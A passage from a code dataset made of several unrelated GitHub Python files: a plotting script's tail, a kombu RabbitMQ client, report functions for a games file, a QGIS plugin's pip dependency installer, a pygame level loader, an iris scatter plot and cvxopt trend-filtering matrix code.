cplot_props['norm'] = LogNorm()\r\n elif args.centeredz:\r\n cplot_props['norm'] = CenteredNorm()\r\n else:\r\n cplot_props['norm'] = Normalize()\r\n if args.crange:\r\n # cplot_props.update(vmin=crange[p][0], vmax=crange[p][1])\r\n cplot_props['norm'].vmin = crange[p][0]\r\n cplot_props['norm'].vmax = crange[p][1]\r\n if args.csigma:\r\n cmean, cstd = np.nanmean(interp_data), np.nanstd(interp_data)\r\n # set limits on the norm itself; passing norm together with vmin/vmax kwargs raises in newer matplotlib\r\n cplot_props['norm'].vmin = cmean-args.csigma*cstd\r\n cplot_props['norm'].vmax = cmean+args.csigma*cstd\r\n print('column \\'{:s}\\':\\tmean = {:.5g}\\tstddev = {:.5g}\\tcrange = {:.5g} to {:.5g}'.format(clabel, cmean, cstd, cplot_props['norm'].vmin, cplot_props['norm'].vmax))\r\n cplot = ax.imshow(interp_data, extent=(X1, X2, Y1, Y2), **cplot_props)\r\n cbar = fig.colorbar(cplot, ax=ax)\r\n cbar.set_label(clabel)\r\n else:\r\n cplot_props = dict(s=colorplot_marker_size, edgecolors='none')\r\n if args.masknegative: # this is supposed to enable mask color in scatter plot mode\r\n cplot_props['plotnonfinite'] = True\r\n if args.logz:\r\n cplot_props['norm'] = LogNorm()\r\n elif args.centeredz:\r\n cplot_props['norm'] = CenteredNorm()\r\n else:\r\n cplot_props['norm'] = Normalize()\r\n if args.square:\r\n cplot_props['marker'] = 's'\r\n for p, (ax, usecol, clabel) in enumerate(zip(it.cycle(axes), usecols, labels[usecols])):\r\n if args.csigma:\r\n cmean, cstd = np.nanmean(raw_data[:, usecol]), np.nanstd(raw_data[:, usecol])\r\n vmin, vmax = cmean-args.csigma*cstd, cmean+args.csigma*cstd\r\n print('column \\'{:s}\\':\\tmean = {:.5g}\\tstddev = {:.5g}\\tcrange = {:.5g} to {:.5g}'.format(clabel, cmean, cstd, vmin, vmax))\r\n else:\r\n vmin, vmax = crange[p][0], crange[p][1]\r\n if args.crange or args.csigma: # apply manual or sigma-derived limits via the norm\r\n cplot_props['norm'].vmin = vmin\r\n cplot_props['norm'].vmax = vmax\r\n cplot = ax.scatter(raw_data[:, plotvs[0]], raw_data[:, plotvs[1]], c=raw_data[:, usecol], cmap=args.cmap, **cplot_props)\r\n cbar = fig.colorbar(cplot, ax=ax)\r\n cbar.set_label(clabel)\r\n #ax.autoscale(enable=True, axis='both', tight=True)\r\n print('{} files'.format(len(files)))\r\n\r\n fig.tight_layout()\r\n if lineplot_mode and not args.nolegend:\r\n leg = ax.legend(loc=0)\r\n #leg = fig.legend(loc='lower center')\r\n try:\r\n leg.set_draggable(True)\r\n except:\r\n leg.draggable()\r\n plt.show()\r\n\r\n# call first instance of main()\r\nmain()\r\n","repo_name":"sergiodlb/speedyplot","sub_path":"speedyplot.py","file_name":"speedyplot.py","file_ext":"py","file_size_in_byte":66152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25066405131","text":"# -*- encoding: utf-8 -*-\n'''\nCreated on 2016-08-29\n\n@author: huawei\n'''\nfrom kombu import Connection, Exchange, Queue\n\n\nclass KombuClient(object):\n def __init__(self,url=\"amqp://172.16.4.134\"):\n self.url= url\n self.conn = Connection(self.url)\n \n \n def addQueue(self,queueName,exchangeName=None,routingKey=None,priority=1):\n self._connect()\n exchangeName = exchangeName if exchangeName else queueName\n routingKey = routingKey if routingKey else queueName\n \n science_news = Queue(queueName,exchange=Exchange(exchangeName),routing_key=routingKey,max_priority=priority)\n chan = self.conn.channel()\n try:\n bound_science_news = science_news(chan)\n bound_science_news.declare()\n finally: \n chan.close()\n self._release()\n \n def deleteQueue(self,queueName,exchangeName):\n self._connect()\n science_news = Queue(queueName)\n chan = self.conn.channel()\n try:\n bound_science_news = science_news(chan)\n bound_science_news.delete()\n finally: \n 
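# close the channel even if delete() raised; the connection itself is released below via _release()\n 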
chan.close()\n self._release()\n \n def deleteExchange(self,exchangeName):\n self._connect()\n chan = self.conn.channel()\n bound_exchange = Exchange(exchangeName)\n try:\n bound_exchange=bound_exchange(chan)\n bound_exchange.delete()\n finally: \n chan.close()\n self._release()\n \n def sendMessage(self,exchangeName,message,routingKey=None):\n self._connect()\n chan = self.conn.channel()\n bound_exchange = Exchange(exchangeName)\n routingKey = routingKey if routingKey else exchangeName\n try:\n bound_exchange=bound_exchange(chan)\n message = bound_exchange.Message(message)\n bound_exchange.publish(message,routingKey)\n finally: \n chan.close()\n self._release()\n \n \n def clearQueue(self,queueName):\n self._connect()\n science_news = Queue(queueName)\n chan = self.conn.channel()\n try:\n bound_science_news = science_news(chan)\n bound_science_news.purge()\n finally: \n chan.close()\n self._release()\n \n def _connect(self):\n self.conn.connect()\n \n def _release(self):\n self.conn.release()","repo_name":"alonelaval/cabbage-celery","sub_path":"src/cabbage/common/Kombu/kombu_amqp_client.py","file_name":"kombu_amqp_client.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"14782645502","text":"import random\n\nnames = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']\nmajors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']\n\ndef students_list(num_students):\n #li = []\n #for i in range(num_students):\n # j = names[random.randint(0,5)]\n # k = majors[random.randint(0,4)]\n # t = (i,j,k)\n\n # li.append(t)\n li = [(i,names[random.randint(0,5)],majors[random.randint(0,4)]) for i in range(num_students)]\n return li\n\n\ndef students_generator(num_students):\n li = ((i,names[random.randint(0,5)],majors[random.randint(0,4)]) for i in range(num_students))\n return li\n\n#people = students_list(1000000)\npeople = students_generator(1000000)\n\nprint(next(people))\nprint(next(people))\nprint(next(people))\nprint(next(people))\nprint(next(people))","repo_name":"EskilWennevold/Python","sub_path":"Generator/Majors.py","file_name":"Majors.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39636061141","text":"# Report functions\n\n\ndef open_file(file_name):\n \"\"\"Opens the file and returns content in the form of a list\"\"\"\n try:\n with open(file_name, \"r\") as f:\n content = f.readlines()\n content = [game for game in content if game]\n content = [game.split(\"\\t\") for game in content]\n return content\n except FileNotFoundError as err:\n raise err\n\n\ndef count_games(file_name):\n \"\"\"Returns number of lines in a file (games)\"\"\"\n content = open_file(file_name)\n return len(content)\n\n\ndef decide(file_name, year):\n \"\"\"Returns True if there is a game from given year in a file. 
Otherwise returns False\"\"\"\n if type(year) != int:\n raise ValueError(\"Not a valid year\")\n content = open_file(file_name)\n for game in content:\n if str(year) in game:\n return True\n return False\n\n\ndef get_latest(file_name):\n \"\"\"Returns title of the latest game in the file\"\"\"\n content = open_file(file_name)\n game_name = content[0][0]\n game_year = int(content[0][2])\n latest = [game_name, game_year]\n for game in range(1, len(content)):\n game_name = content[game][0]\n game_year = int(content[game][2])\n if latest[1] < game_year:\n latest[0] = game_name\n latest[1] = game_year\n return latest[0]\n\n\ndef count_by_genre(file_name, genre):\n \"\"\"Returns the number of games from given genre from the file\"\"\"\n if type(genre) != str:\n raise TypeError(\"Invalid genre\")\n content = open_file(file_name)\n genre_index = 3\n count = 0\n for game in content:\n if genre.lower() == game[genre_index].lower():\n count += 1\n return count\n\n\ndef get_line_number_by_title(file_name, title):\n \"\"\"Returns the number of line of a given game(title) from the file\"\"\"\n if type(title) != str:\n raise TypeError(\"Invalid title\")\n content = open_file(file_name)\n title_index = 0\n titles = [game[title_index] for game in content]\n try:\n line = titles.index(title) + 1\n except ValueError as err:\n raise err\n return line\n\n\ndef quick_sort(lst):\n \"\"\"Sorting algorithm\"\"\"\n if not lst:\n return []\n return (quick_sort([x for x in lst[1:] if x < lst[0]])\n + [lst[0]] +\n quick_sort([x for x in lst[1:] if x >= lst[0]]))\n\n\ndef sort_abc(file_name):\n \"\"\"Sort and return title list\"\"\"\n content = open_file(file_name)\n title_index = 0\n arr = [game[title_index] for game in content]\n arr = quick_sort(arr)\n return arr\n\n\ndef get_genres(file_name):\n \"\"\"Return sorted genre list without duplicates\"\"\"\n content = open_file(file_name)\n genre_index = 3\n genres = list(set([game[genre_index] for game in content]))\n genres = quick_sort(genres)\n return genres\n\n\ndef when_was_top_sold_fps(file_name):\n \"\"\"Return year of a top selling fps game\"\"\"\n content = open_file(file_name)\n copies_sold_index = 1\n year_index = 2\n genre_index = 3\n best_selling_fps = []\n for game in content:\n if game[genre_index] == \"First-person shooter\":\n if len(best_selling_fps) == 0:\n best_selling_fps = [float(game[copies_sold_index]), game[year_index]]\n elif best_selling_fps[0] < float(game[copies_sold_index]):\n best_selling_fps = [float(game[copies_sold_index]), game[year_index]]\n if len(best_selling_fps) == 0:\n raise ValueError(\"No fps game in the file\")\n return int(best_selling_fps[1])\n\n","repo_name":"AlekEl/Python-Game-statistics-reports","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16455080368","text":"import os\nimport sys\nimport importlib\nfrom qgis.PyQt.QtWidgets import QMessageBox\n\n\ndef check(required_packages):\n # Check if required packages are installed\n missing_packages = []\n for package in required_packages:\n try:\n importlib.import_module(package)\n if package == 'pdfgpt':\n import pdfgpt\n if pdfgpt.__version__ != '0.2.2':\n missing_packages.append('pdfgpt==0.2.2')\n except ImportError:\n if package == 'SpeechRecognition':\n try:\n import speech_recognition as sr\n continue\n except:\n pass\n missing_packages.append(package)\n\n try:\n import openai\n update_version = False\n if 
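Several helpers in the reports.py record above hand-roll loops that the standard library expresses directly; for example, get_latest is a max() with a key, under the same row layout (title at index 0, year at index 2). A sketch:

```python
def get_latest(content):
    # content rows look like [title, copies_sold, year, genre, ...]
    return max(content, key=lambda game: int(game[2]))[0]
```

Likewise, the recursive quick_sort there could be replaced by the built-in sorted(), which is stable and avoids quadratic worst cases on nearly-sorted input.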
openai.version.VERSION == '0.27.0':\n update_version = True\n except:\n update_version = False\n\n if missing_packages:\n message = \"The following Python packages are required to use the plugin QChatGPT:\\n\\n\"\n message += \"\\n\".join(missing_packages)\n message += \"\\n\\nWould you like to install them now? After installation please restart QGIS.\"\n\n reply = QMessageBox.question(None, 'Missing Dependencies', message,\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.No:\n return\n\n for package in missing_packages:\n update = False\n try:\n os.system('\"' + os.path.join(sys.prefix, 'scripts', 'pip') + f'\" install {package}')\n update = True\n finally:\n if not update:\n try:\n importlib.import_module(package)\n import subprocess\n subprocess.check_call(['python3', '-m', 'pip', 'install', package])\n except:\n importlib.import_module(package)\n\n # Upgrade openai\n if update_version:\n message = \"The package openai needs an update for the plugin QChatGPT:\\n\\n\"\n message += \"\\n\".join(missing_packages)\n message += \"\\n\\nWould you like to update now?\"\n\n reply = QMessageBox.question(None, 'Missing Dependencies', message,\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.No:\n return\n\n update = False\n try:\n os.system('\"' + os.path.join(sys.prefix, 'scripts', 'pip') + f'\" install --upgrade openai')\n update = True\n finally:\n if not update:\n try:\n import subprocess\n subprocess.check_call(['python3', '-m', 'pip', 'install', f'\" --upgrade openai'])\n except:\n pass\n","repo_name":"KIOS-Research/QChatGPT","sub_path":"install_packages/check_dependencies.py","file_name":"check_dependencies.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"74997059926","text":"user_text = 'utifulBea si terbet ntha y/ugl icitExpl is erbett than icit/impl eSimpl si rbette hant ex/compl ' \\\n 'xComple is better anth cated/compli tFla si etterb ntha nested/ arseSp is tterbe than nse/de ' \\\n 'tyReadabili unts/co cialSpe cases (taren cialspe ghenou to break '\nuser_text = user_text.split(' ')\nprint(user_text)\nnew_text = []\nlen_letter = 0\ntemp_letter = []\ntext = ''\nk = 0\n\nfor letter in user_text:\n if not k % 2 and len(letter) == 2:\n temp_letter = letter[-1:] + letter[:-1]\n new_text.append(temp_letter)\n continue\n\n # temp_letter = letter[-k-3:] + letter[:-k-3]\n temp_letter = letter[(len(letter) + -1 * k) % len(letter):] + letter[:(len(letter) + -1 * k) % len(letter)]\n\n if str(temp_letter).endswith('/'):\n new_text.append(temp_letter[:-1] + '\\n')\n k += 1\n continue\n\n new_text.append(temp_letter)\n\n temp_letter = []\ntext = ' '.join(new_text)\n\nprint(text)\n","repo_name":"ProgmanZ/Modul-18.6-Tasks-HW-","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14075901804","text":"import pygame\nfrom pygame import *\nfrom blocks import *\nfrom monsters import *\nfrom settings import *\n#import random\n\nclass Level:\n\n def __init__(self, way):\n self.levelFile = open(\"%s/{}\".format(way) % ICON_DIR, 'r')\n self.playerX = 0\n self.playerY = 0\n self.level = []\n self.platforms = []\n self.entities = pygame.sprite.Group()\n self.monsters = pygame.sprite.Group()\n \n a = int(self.levelFile.readline().replace(\"\\n\", \"\"))\n for i in range(a):\n self.line = 
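The dependency checker above detects versions by importing the packages themselves (pdfgpt.__version__, openai.version.VERSION). importlib.metadata (Python 3.8+) reads the installed version from package metadata without importing it, which avoids import-time side effects; version_mismatch below is a hypothetical helper name:

```python
from importlib import metadata

def version_mismatch(package: str, wanted: str) -> bool:
    # True when the package is missing or installed at a different version
    try:
        return metadata.version(package) != wanted
    except metadata.PackageNotFoundError:
        return True

# e.g. version_mismatch("pdfgpt", "0.2.2") mirrors the pdfgpt.__version__ test
```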
self.levelFile.readline()\n self.level.append(self.line[0:len(self.line) - 1])\n \n b = int(self.levelFile.readline().replace(\"\\n\",''))\n for i in range(b):\n self.line = self.levelFile.readline().replace(\"\\n\",'')\n if self.line == \"Player\":\n self.playerX = int(self.levelFile.readline().replace(\"\\n\",\"\"))\n self.playerY = int(self.levelFile.readline().replace(\"\\n\",\"\"))\n if self.line == \"Monster\":\n mn = Monster(int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")),\n int(self.levelFile.readline().replace(\"\\n\",\"\")))\n self.entities.add(mn)\n self.platforms.append(mn)\n self.monsters.add(mn) \n \n #if self.line[0] != \"\": # если строка не пустая\n # self.commands = self.line.split() # разбиваем ее на отдельные команды\n #if len(self.commands) > 1: # если количество команд > 1, то ищем эти команды\n # if self.commands[0] == \"player\": # если первая команда - player\n # self.playerX= int(self.commands[1]) # то записываем координаты героя\n # self.playerY = int(self.commands[2])\n # if self.commands[0] == \"monster\": # если первая команда monster, то создаем монстра\n # mn = Monster(int(self.commands[1]),int(self.commands[2]),int(self.commands[3]),int(self.commands[4]),int(self.commands[5]),int(self.commands[6]))\n # self.entities.add(mn)\n # self.platforms.append(mn)\n # self.monsters.add(mn)\n \n self.convertLvl()\n \n def convertLvl(self):\n\n x=y=0 # координаты\n for row in self.level: # вся строка\n for col in row: # каждый символ\n\n if col == \"-\":\n pf = Platform(x,y)\n self.entities.add(pf)\n self.platforms.append(pf)\n\n if col == \"*\":\n bd = BlockDie(x,y)\n self.entities.add(bd)\n self.platforms.append(bd)\n\n if col == \"W\":\n end = End(x,y)\n self.entities.add(end)\n self.platforms.append(end)\n\n if col == \"H\":\n m = Half(x,y)\n self.entities.add(m)\n self.platforms.append(m)\n \n if col == \"M\":\n m = Magnit(x,y)\n self.entities.add(m)\n self.platforms.append(m)\n \n if col == \"C\":\n c = Coin(x,y)\n self.entities.add(c)\n self.platforms.append(c)\n \n # if col == \"M\":\n # m = Movable(x,y)\n # self.entities.add(m)\n # self.platforms.append(m)\n \n \n #слишком сильно кушает фпс\n # if col == \" \":\n # r = random.randint(0,2)\n # if r == 0:\n # b = Platform(x,y, \"block/0.png\")\n # elif r ==1:\n # b = Platform(x,y, \"block/1.png\")\n # else:\n # b = Platform(x,y, \"block/2.png\")\n # self.entities.add(b)\n\n x += PLATFORM_WIDTH #блоки платформы ставятся на ширине блоков\n y += PLATFORM_HEIGHT #то же самое и с высотой\n x = 0 #на каждой новой строчке начинаем с нуля\n\n def getLvl(self):\n return self.level\n\n def getPlayerX(self):\n return self.playerX\n\n def getPlayerY(self):\n return self.playerY\n\n def getEntities(self):\n return self.entities\n\n def getPlatforms(self):\n return self.platforms\n \n def getMonsters(self):\n return self.monsters\n","repo_name":"KoSTyA-bel/-","sub_path":"readlevel.py","file_name":"readlevel.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38986356202","text":"import pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\",\n names = [\"Sepal Length\", \"Sepal Width\", \"Petal Length\", \"Petal 
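convertLvl in the readlevel.py record above maps one tile character to one block class per if-branch; a lookup table makes that mapping explicit and keeps the loop flat. A sketch assuming the same classes and constants as the record's own star-imports:

```python
from blocks import Platform, BlockDie, End, Half, Magnit, Coin
from settings import PLATFORM_WIDTH, PLATFORM_HEIGHT

TILE_CLASSES = {"-": Platform, "*": BlockDie, "W": End,
                "H": Half, "M": Magnit, "C": Coin}

def convert_level(level, entities, platforms):
    for row_idx, row in enumerate(level):
        for col_idx, ch in enumerate(row):
            cls = TILE_CLASSES.get(ch)
            if cls is None:
                continue  # blanks and unknown tiles are skipped
            block = cls(col_idx * PLATFORM_WIDTH, row_idx * PLATFORM_HEIGHT)
            entities.add(block)
            platforms.append(block)
```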
Width\", \"Class\"])\ncolors = {\"Iris-setosa\": \"red\", \"Iris-versicolor\": \"blue\", \"Iris-virginica\": \"green\"}\nprint(df)\n\nplt.scatter(df[\"Sepal Length\"], df[\"Sepal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Sepal Length\")\nplt.ylabel(\"Sepal Width\")\nplt.show()\nplt.scatter(df[\"Petal Length\"], df[\"Petal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Petal Length\")\nplt.ylabel(\"Petal Width\")\nplt.show()\nplt.scatter(df[\"Sepal Length\"], df[\"Petal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Sepal Length\")\nplt.ylabel(\"Petal Width\")\nplt.show()\nplt.scatter(df[\"Petal Length\"], df[\"Sepal Width\"], c=df[\"Class\"].map(colors))\nplt.xlabel(\"Petal Length\")\nplt.ylabel(\"Sepal Width\")\nplt.show()\n\n","repo_name":"KrzycheG/ProgramowaniePython","sub_path":"Zadanie3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35011711902","text":"from scipy.special import lambertw\nfrom cvxopt import solvers,matrix,spmatrix,sparse,spdiag,div,mul,exp\n\nimport numpy as np\nimport gc\nfrom time import ctime\nfrom os.path import join\n\n\ndef compute_cp_matrices(n_rows,n_cols,T,lam_t,lam_s,lh_trend=True,\n ifCompute_Gh=False,wrapAround=True):\n '''\n This computes the matrices used in cp optimization.\n '''\n \n grid_size=n_rows*n_cols\n if grid_size>200:\n print(ctime()+'...computing optimization matrices...')\n\n if wrapAround:#no. of spatial constraints\n r_s=T*(2*n_rows*n_cols-n_rows);\n else:\n r_s=T*(2*n_rows*n_cols-n_rows-n_cols);\n r_t=n_rows*n_cols*(T-2);#no. of temporal constraints\n \n #===form matrix D===\n #---spatial penalty---\n I_s=[];J_s=[];x_s=[];\n\n for c in range(n_cols):\n for r in range(n_rows):\n \n #---determine the neighbors of the current point---\n if ((r<(n_rows-1)) & (c<(n_cols-1))):\n r_n=[r+1,r];c_n=[c,c+1]\n elif ((r==(n_rows-1)) & (c<(n_cols-1))):\n r_n=[r];c_n=[c+1]\n elif (c==(n_cols-1)):\n if wrapAround:\n r_n=[r+1,r];c_n=[c,0]\n else:\n r_n=[r+1];c_n=[c]\n if (r==(n_rows-1)):\n continue\n \n idx_n=np.ravel_multi_index((r_n,c_n),\n dims=(n_rows,n_cols),order='F')\n\n idx=np.ravel_multi_index((r,c),\n dims=(n_rows,n_cols),order='F') \n #---determine the neighbors of the current point---\n \n #---add indices corresponding to current point and its neighbors---\n for i in idx_n:\n I_s.append(len(I_s)*T+np.tile(np.arange(T),(1,2)))\n J_s.append(np.hstack([np.arange(idx*T,(idx+1)*T),\n np.arange(i*T,(i+1)*T)]))\n x_s.append(np.hstack([np.ones(T),-1*np.ones(T)]))\n\n #---add indices corresponding to current point and its neighbors--- \n I_s=np.hstack(I_s).flatten();J_s=np.hstack(J_s).flatten();\n x_s=np.hstack(x_s).flatten();\n #---spatial penalty---\n\n #---temporal penalty--- \n m=T-2;p=grid_size\n ind=np.arange(m)\n I0=np.tile(ind,(1,3))\n J0=np.concatenate((ind,ind+1,ind+2)).reshape((3*ind.size))\n x_t=np.tile(np.concatenate((np.ones((1,m)),\n -2*np.ones((1,m)),\n np.ones((1,m))),axis=1),p).flatten()\n \n #-long-horizon penalty-\n if lh_trend:\n n_year=T/52\n I_lh0=[];J_lh0=[];x_lh0=[]\n for i in range(n_year-2):\n I_lh0.append([i]*3*52)\n J_lh0.append(np.arange(i*52,i*52+3*52))\n x_lh0.append([1.0]*52+[-2.0]*52+[1.0]*52)\n I_lh0=np.concatenate(I_lh0);J_lh0=np.concatenate(J_lh0);\n x_lh=np.tile(np.concatenate(x_lh0),(p,))\n I_lh=[I_lh0];J_lh=[J_lh0];\n #-long-horizon penalty-\n \n I_t=[I0];J_t=[J0]; \n for pp in range(p-1):\n I_t.append(I0+(pp+1)*m)\n J_t.append(J0+(pp+1)*T)\n if lh_trend:\n 
I_lh.append(I_lh0+(n_year-2)*(pp+1))\n J_lh.append(J_lh0+T*(pp+1))\n I_t=np.hstack(I_t).flatten();J_t=np.hstack(J_t).flatten();\n #---temporal penalty---\n \n if lh_trend:\n r_lh=(n_year-2)*p#this is used in computing h below\n I_lh=np.hstack(I_lh);J_lh=np.hstack(J_lh);\n I=np.hstack([I_t,I_s+r_t,I_lh+r_s+r_t]);\n J=np.hstack([J_t,J_s,J_lh]);\n x=np.hstack([x_t,x_s,x_lh]);\n D=spmatrix(x,I,J,size=(r_s+r_t+r_lh,T*grid_size)) \n else: \n I=np.hstack([I_t,I_s+r_t]);J=np.hstack([J_t,J_s]);\n x=np.hstack([x_t,x_s]);\n D=spmatrix(x,I,J,size=(r_s+r_t,T*grid_size))\n r_lh=0\n #===form matrix D===\n \n #===form matrix G,h===\n if ifCompute_Gh:\n r_D=D.size[0];c_D=D.size[1]\n if grid_size>200:\n print('\\t'+ctime()+'...computing G...') \n G=sparse([-D.T,spdiag([1.0]*r_D),spdiag([-1.0]*r_D)])\n h=np.atleast_2d(np.hstack(([1.0]*c_D,\n [lam_t]*r_t,[lam_s]*r_s,[lam_t]*r_lh,\n [lam_t]*r_t,[lam_s]*r_s,[lam_t]*r_lh))).\\\n transpose()\n h=matrix(h)\n return D,G,h\n else:\n return D\n #===form matrix G,h===\n\ndef computeLoss(Z,Y,D,lam_t,lam_s,T,n_rows,n_cols,lh_trend):\n '''\n This function evaluates the objective function at a given solution\n Z.\n '''\n \n n_t=n_rows*n_cols*(T-2);#no. of temporal constraints\n n_lh=0\n if lh_trend:\n n_year=T/52\n n_lh=(n_year-2)*n_rows*n_cols\n n_s=D.size[0]-n_lh-n_t#no. of spatial constraints\n lam_vec=np.array(n_t*[lam_t]+n_s*[lam_s]+n_lh*[lam_t]).reshape((1,-1))\n \n f1=np.sum(np.array(Z+mul(Y**2,exp(-Z))))\n f2=float(lam_vec.dot( np.abs(np.array(D*Z)) ))\n \n return f1+f2\n\ndef ComputeLocToGlobVarTransform(n_rows,n_cols,T,n_r,n_c):\n '''\n This function computes a matrix :math:`A` which specifies the relationship\n between the local variables :math:`x_i` and the global variable :math:`z` \n for a problem in which the data on a grid are devided into several \n sub-grids. Specifically we have: :math:`z=Ax`, where \n :math:`x=(x_1,...,x_K)^T` and each :math:`x_i` is the collection of the\n local variables corresponding to the sub-grid :math:`i`.\n \n Parameters\n ---------\n n_rows : integer\n number of rows in the oroginal grid.\n n_cols : integer\n number of columns in the oroginal grid.\n n_r : integer\n number of rows in each sub-grid. \n n_c : integer\n number of columns in each sub-grid.\n \n Returns\n -------\n A : sparse\n The transformation matrix.\n '''\n \n boundary_rows=np.arange(0,n_rows,n_r-1)[1:-1]\n boundary_cols=np.arange(0,n_cols,n_c-1)[1:-1]\n n_boundary_rows=boundary_rows.size;n_boundary_cols=boundary_cols.size\n n_x_blk=n_r*n_c*T#no. of x variables in each block\n I_vec=[];J_vec=[]\n\n #===determine block===\n def determineBlock(r,c):\n '''\n This function determines the block :math:`x_i` to which\n a given entity of z belongs. It also returns what row and col\n in that block, the entity is.\n '''\n \n n1=np.sum((r-boundary_rows)>0)\n n2=np.sum((c-boundary_cols)>0)\n blk=n2*(n_boundary_rows+1)+n1#block number\n r_b=r-n1*(n_r-1);c_b=c-n2*(n_c-1)\n return (blk,r_b,c_b)\n #===determine block=== \n \n #===corner points===\n r1=np.tile(boundary_rows,(n_boundary_cols,1)).flatten('F')\n c1=np.tile(boundary_cols,(n_boundary_rows,1)).flatten()\n idx1=np.ravel_multi_index((r1,c1),(n_rows,n_cols),order='F')\n \n #these are the conrner points. 
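The temporal block of D assembled above applies the second-difference stencil (1, -2, 1) along each time series, which corresponds to an l1 trend-filtering penalty on each series. The same block can be cross-checked with scipy.sparse, which is often easier to inspect than cvxopt spmatrix triplets:

```python
import numpy as np
from scipy import sparse

def second_difference(T: int) -> sparse.csr_matrix:
    # row i applies x[i] - 2*x[i+1] + x[i+2], for i = 0 .. T-3
    m = T - 2
    rows = np.repeat(np.arange(m), 3)
    cols = (np.arange(m)[:, None] + np.arange(3)).ravel()
    vals = np.tile([1.0, -2.0, 1.0], m)
    return sparse.csr_matrix((vals, (rows, cols)), shape=(m, T))

D_t = second_difference(5)
assert np.allclose(D_t @ np.arange(5.0), 0.0)  # linear trends are annihilated
```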
So they are always the\n #(n_r,n_c) entery of one block, and the (0,n_c) entry of the block below,\n #(n_r,0) entery of block ont the right,\n #and the (0,0) entry of the block diagonal to the first block.\n for i,idx in enumerate(idx1):\n I=np.tile(np.arange(idx*T,(idx+1)*T),4)\n \n blk1,r_b1,c_b1=determineBlock(r1[i],c1[i])\n idx_in_blk1=np.ravel_multi_index((r_b1,c_b1),(n_r,n_c),order='F') \n J1=np.arange(blk1*n_x_blk+idx_in_blk1*T,\n blk1*n_x_blk+(idx_in_blk1+1)*T)\n \n blk2,r_b2,c_b2=(blk1+1,0,n_c-1)\n idx_in_blk2=np.ravel_multi_index((r_b2,c_b2),(n_r,n_c),order='F')\n J2=np.arange(blk2*n_x_blk+idx_in_blk2*T,\n blk2*n_x_blk+(idx_in_blk2+1)*T)\n\n blk3,r_b3,c_b3=(blk1+n_boundary_rows+1,n_r-1,0)\n idx_in_blk3=np.ravel_multi_index((r_b3,c_b3),(n_r,n_c),order='F')\n J3=np.arange(blk3*n_x_blk+idx_in_blk3*T,\n blk3*n_x_blk+(idx_in_blk3+1)*T)\n\n blk4,r_b4,c_b4=(blk1+n_boundary_rows+2,0,0)\n idx_in_blk4=np.ravel_multi_index((r_b4,c_b4),(n_r,n_c),order='F')\n J4=np.arange(blk4*n_x_blk+idx_in_blk4*T,\n blk4*n_x_blk+(idx_in_blk4+1)*T)\n \n I_vec.append(I);J_vec.append(np.hstack((J1,J2,J3,J4)))\n #===corner points===\n \n #===row boundary points===\n r2=np.tile(boundary_rows,(n_cols-n_boundary_cols,1)).flatten('F')\n c2=np.tile(np.delete(np.arange(n_cols),boundary_cols),\n (n_boundary_rows,1)).flatten()\n idx2=np.ravel_multi_index((r2,c2),(n_rows,n_cols),order='F')\n \n #these are the points on the row boundaries. So they are always the\n #(n_r,c) entery of one block and the (0,c) entry of the block below.\n for i,idx in enumerate(idx2):\n blk1,r_b1,c_b1=determineBlock(r2[i],c2[i])\n idx_in_blk1=np.ravel_multi_index((r_b1,c_b1),(n_r,n_c),order='F')\n I=np.tile(np.arange(idx*T,(idx+1)*T),2)\n J1=np.arange(blk1*n_x_blk+idx_in_blk1*T,\n blk1*n_x_blk+(idx_in_blk1+1)*T)\n blk2,r_b2,c_b2=(blk1+1,0,c_b1)\n idx_in_blk2=np.ravel_multi_index((r_b2,c_b2),(n_r,n_c),order='F')\n J2=np.arange(blk2*n_x_blk+idx_in_blk2*T,\n blk2*n_x_blk+(idx_in_blk2+1)*T)\n \n I_vec.append(I);J_vec.append(np.hstack((J1,J2))) \n #===row boundary points===\n \n #===column boundary points=== \n r3=np.tile(np.delete(np.arange(n_rows),boundary_rows),\n (n_boundary_cols,1)).flatten()\n c3=np.tile(boundary_cols,(n_rows-n_boundary_rows,1)).flatten('F')\n idx3=np.ravel_multi_index((r3,c3),(n_rows,n_cols),order='F')\n \n #these are the points on the col boundaries. 
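The block bookkeeping here leans on np.ravel_multi_index with order='F' (column-major), so the flat index is row + col * n_rows; a two-line check makes that convention concrete:

```python
import numpy as np

idx = np.ravel_multi_index((1, 2), dims=(3, 4), order="F")
assert idx == 1 + 2 * 3  # row + col * n_rows == 7
assert np.unravel_index(idx, (3, 4), "F") == (1, 2)
```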
